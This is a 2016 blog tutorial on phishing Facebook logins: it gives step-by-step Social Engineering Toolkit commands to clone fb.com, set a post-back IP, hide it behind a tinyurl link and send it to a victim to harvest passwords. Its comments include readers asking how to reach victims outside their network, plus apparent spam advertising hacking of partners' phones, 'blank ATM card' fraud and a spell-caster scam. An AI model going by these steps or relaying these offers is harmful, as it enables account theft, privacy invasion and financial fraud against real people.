Saturday, August 13, 2016

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.




WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.


LET'S DO THIS!!!!!!!!!

Follow this video..........



STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com

    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

****************************************************

ETHICAL HACKING COURSE (88% off) : Click here

****************************************************


More Detailed Guides

If there's something that isn't clear then there's a 3 post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvestor attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extent attack outside your LAN

45 comments:

  1. completed all the steps, not able to get details in harvester file

    ReplyDelete
    Replies
    1. It only works when you are in the Same Local Netwok -.-

      Delete
    2. You should use your external IP and open port 80 on your modem/router for your internal IP.

      Delete
    3. how to send the clone website to my victim

      Delete
    4. How to send the clone website to my victim

      Delete
  2. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
  3. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
    Replies
    1. your using a usb for your wifi?
      Kali linux doesn't pickup your onboard network card if your using a VM box

      Delete
    2. sudo ifconfig

      Delete
    3. You really shouldn't be using a VM to do network related stuff. Either run a live CD/USB/whatever or install Kali.

      Delete
  4. But this only works for people on the same network, correct?

    ReplyDelete
    Replies
    1. Redirect the 80 port to your machine

      Delete
    2. yes on same network users

      Delete
  5. The url doesn't work for me the next day. Could someone Help me pls

    ReplyDelete
  6. How do i stop this (apache etc) after snatching the credentials and want to disappear?

    ReplyDelete
  7. after i did all steps the site cant be reached

    ReplyDelete
  8. It would be great if u make a tutorial on hacking instagram :p.

    ReplyDelete
  9. Article is nice and working for me.for hacking facebook using brute force attack follow below link it may hack every facebook account

    http://www.kalilinuxdojo.com/2015/11/hack-facebook-using-python-script-via-brute-force-attack.html

    ReplyDelete
  10. what's mean "Shorten your ip address with tinyurl.com ". please. explain clearly?

    ReplyDelete
    Replies
    1. Shorten means nothing but hiding your IP behind an URL!

      Delete
    2. how to shorten the ip address explain it

      Delete
  11. How do you use it on people without them being on the same network?

    ReplyDelete
  12. Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
    Replies
    1. tambem estou com esse erro

      Delete
  13. MY IP VERSION IS6 AND TINYURL IS MAKING TROUBLE

    ReplyDelete
  14. getting this error how to fix it- Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
  15. hack into public hot spot then get fb credentials

    ReplyDelete
  16. the website thus created for fishing only works in the same computer from where the process is done.if i send that fishing page to any others mail it doesnt open up. can u help me hacking a persons id who a state away?

    ReplyDelete
  17. How to shorten the IP to tiny URL?pls help me

    ReplyDelete
  18. Hello everyone! If you require the service of a professional hacker to help track your partner's cell phone remotely, contact deadlyhacker01@gmail.com, he helped me hack my husband's phone without physical contact.
    Tell him Stacey referred you, he'd help

    ReplyDelete

  19. Hi, everyone it has come to my knowledge how difficult it is to come across someone so legit for this job, I basically think we don’t need to face any more lies and deceit from our spouse, long time i was fooled around but right now as far as I’m concerned about this job, universalhacker99@gmail.com he’s ] real.
    he saved me from the lies of my cheating fiance, he deals on any type of hack such as gmail, Facebook, whatsapp, mobile phone, Skype, websites, upgrading scores, database, software testing, password sniffing, Cpanels, mystery shopper, SQL DB penetration, lease penetration and lots more, Mail him if you got any issue, he would definitely get it done with the quickest time frame.

    ReplyDelete
  20. This method wont work against HTTPS, exmple chrome user, it will always HTTPS and there will be a notice if it is not safe.

    ReplyDelete
  21. It only work in same network connection can't access external users

    ReplyDelete
  22. please tell me how to reset this attack

    ReplyDelete
  23. hi,
    I get this error
    "[!] Something went wrong, printing the error: zipimporter() argument 1 must be string, not function"

    can anyone please help.

    thanks

    ReplyDelete
  24. the clone webpage comes in my regional language (hindi) when I or anyone visit the clone webpage. It looks like a fake page, what should i do to make it in english

    ReplyDelete
  25. hey i have a doubt not related to this .I am using kali linux and sometime i cant access any website but i can access fb,google.youtube .Terminal cant install any app it show connecting to kali.org then it stops.plz help!!

    ReplyDelete
  26. I need your help bro'' Please Help me''
    will you help me?
    don't refuse''

    ReplyDelete
  27. Am seriously greatful sir,for taken me out of poverty through the help of blank ATM card once again may God continue to bless you for the good job you are doing for people all over the globe contact engineer harry today if you want your life to turn around for good i was once living in poverty and i was so poor to extent i can not even eat non to pay my house rentage even people laugh at me and call me all salt of names but today here i am now leaving big and large all because of engineer harry through the blank ATM card he programmed for me..you too can give this man named harry a try through his mail/harrytechworld@gmail.com.or add him on whatsapp+2348074609849

    ReplyDelete
  28. I have my ATM card already programmed to withdraw the maximum of $ 4,000 a day for a maximum of 20 days. I'm so happy with this because I got mine last week and I've used it to get $ 44,000. Mr Martins is giving the card just to help the poor and needy even though it is illegal but it is something nice and it is not like another scam pretending to have the ATM cards blank. And no one gets caught when using the card. Get yours today by sending a mail to martinshackers22@gmail.com

    ReplyDelete
  29. During my time of difficulty and heartbreak i was able to find refuge in the hands of Dr.AZA through his act of spell casting that he was able to bring my lover back within 48 hours, my husband left me and the kids for another woman and he said to me that he just want to be alone for sometime and i was so depress by his words and action but not knowing he did it because of another woman. The first time i read an article about Dr.AZA i was wondering if all the things that i read about were true because a lot of people where testifying about his good work, But since i was desperate to get my lover back i had no choice than to contact him through these details whatsApp number +2348107155060 and via email: azaspellcaster@gmail.com And to my greatest surprise i was able to get a positive result that got me shocked because my lover called me within 48 hours that i contacted Dr.AZA

    ReplyDelete
  30. Hello , are you in any financial problems or you are finding it very difficult to pay your bills? or you need money to start a new business ? if yes then email us today to get a Blank ATM Programmed Card and cash money directly in any ATM Machine around you. You can withdaw $1200 daily and the card is programmed with efficient and unique technology It's 100% guaranteed secure with no worries, there is no risk of being caught, because the card has been programmed in such a way that it's not traceable, it also has a technique that makes it impossible for the CCTV to detect you. Now email us today at our E-mail address at: johnsiphas@gmail.com and get your card today and live that luxury life you every dream to live.
    Contact Mr John Siphas at johnsiphas@gmail.com

    ReplyDelete
  31. Hello, My name is Natalie and i just feel like letting everyone know about this. There is this new way of making money with a programmed ATM card called the Blank ATM card. I got one through the help of a hacking team called CHEVRON BLANK ATM HACKERS two days after i paid.
    This Blank ATM card is programmed to mess with any ATM and its camera thereby allowing you to withdraw up to $80000 monthly from any ATM. Since i got the card i've been able to withdraw enough to get myself a new car and invest in a huge profit making business. Although it is illegal, there's no risk of being caught and you can use this opportunity to make your life better. For those of us in need of financial stability, you can get more information about this Blank ATM card by contacting them now through their whatsapp no:+2348142630659. email: (atmblank12@gmail.com ). The most amazing thing is I got this Blank ATM card at a very low rate and i hope you also do too.

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC